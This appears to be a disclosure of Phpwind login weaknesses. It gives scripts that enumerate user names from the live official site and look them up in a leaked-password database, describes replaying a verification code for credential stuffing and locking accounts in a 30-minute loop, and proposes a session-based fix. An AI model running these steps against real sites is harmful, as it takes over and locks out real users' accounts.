Phpwind login allows credential stuffing and locking of other users' accounts, and a solution
The Phpwind login is open to credential stuffing (demonstrated on the official website).
It can also be used to lock other users' accounts, continuously (batch locking is not very good, not tested...).
The verification code can also be bypassed.
How it is exploited (black-box test):
1.
First, extract the user names of all accounts.
The code is as follows:
    # Python 2 (urllib2)
    import re, urllib2
    def get(uid):
        # Fetch the public space page for this uid; the user name is in the <title>.
        con = urllib2.urlopen("http://www.phpwind.net/index.php?m=space&uid=" + str(uid)).read()
        r = re.compile(r'<title>(\S+) personal space')
        return r.findall(con)
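2.
Create an interface to the social engineering database that returns the password for a given user name.
    # Python 2 (urllib2)
    import re, urllib2
    def getpass(name):
        # Query the local lookup page and pull the password cells out of the result table.
        con = urllib2.urlopen("http://192.168.1.117/xxx.php?so=" + name).read()
        r = re.compile(r'<td width="27%">(\S{1,16})</td>')
        return r.findall(con)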
3.
Next, the credential stuffing itself.
Go to the login page:
http://www.phpwind.net/index.php?m=u&c=login
Enter the correct verification code, click log in, and capture the packets.
A script can then be written to do the credential stuffing.
4.
Now, how accounts can be locked in batches.
Take the official website as the example.
An account on the official website is locked for 30 minutes after six password errors.
A script can do this, the same way as the password cracking above: six errors and the account is locked.
The user then cannot log in.
After half an hour, continue...
Imagine a script that runs from id 1 to the last id every half hour (the last id can be checked by registering a new account).
Each account gets six wrong passwords and is then locked.
Loop once every 30 minutes...
The test covered 1000 IDs and hit dozens of passwords.
The results are not de-duplicated.
Some accounts have more than six passwords in the database, so they were simply locked without a correct password being found.
So the following data only shows the effect.
Solution:
The following content is for reference only.
I think the verification code value can be stored in the session and refreshed on every submission.
Similar to this:
    // No code stored in the session: reject the submission.
    if ($_SESSION['seccode'] == '') {
        print 'verification code is empty';
        exit();
    }
    // Wrong code: clear the stored value so it cannot be tried again.
    if ($_SESSION['seccode'] != $seccode) {
        $_SESSION['seccode'] = '';
        print 'verification code error';
        exit;
    }
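The session check suggested above, modeled in Python as an added example (not code from the original page or from Phpwind): the stored code is consumed on every submission, so a request captured with one valid verification code cannot be sent again with other passwords. A dict stands in for $_SESSION; the helper names, the code alphabet and the sample account are assumptions.

```python
import hmac
import secrets

# Constructed sample account; a real application compares password hashes.
USERS = {"alice": "correct horse"}
ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"

def issue_code(session, length=4):
    """Create a fresh code, keep it server-side, return it for rendering as an image."""
    code = "".join(secrets.choice(ALPHABET) for _ in range(length))
    session["seccode"] = code
    return code

def check_code(session, submitted):
    """Consume the stored code on every submission, whether it matches or not."""
    expected = session.pop("seccode", "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.upper().encode())

def login(session, name, password, submitted_code):
    # The code is checked (and consumed) before the password is looked at.
    if not check_code(session, submitted_code):
        return "verification code error"
    stored = USERS.get(name)
    if stored is None or not hmac.compare_digest(stored.encode(), password.encode()):
        return "wrong password"
    return "ok"

def replay(session, name, passwords, captured_code):
    """Submit the same captured code with each password in turn."""
    return [login(session, name, p, captured_code) for p in passwords]

if __name__ == "__main__":
    session = {}                  # stands in for $_SESSION
    code = issue_code(session)    # the captcha is solved once
    print(replay(session, "alice", ["123456", "qwerty", "correct horse"], code))
```

Only the first submission reaches the password check; every later one fails on the verification code, including the one carrying the correct password.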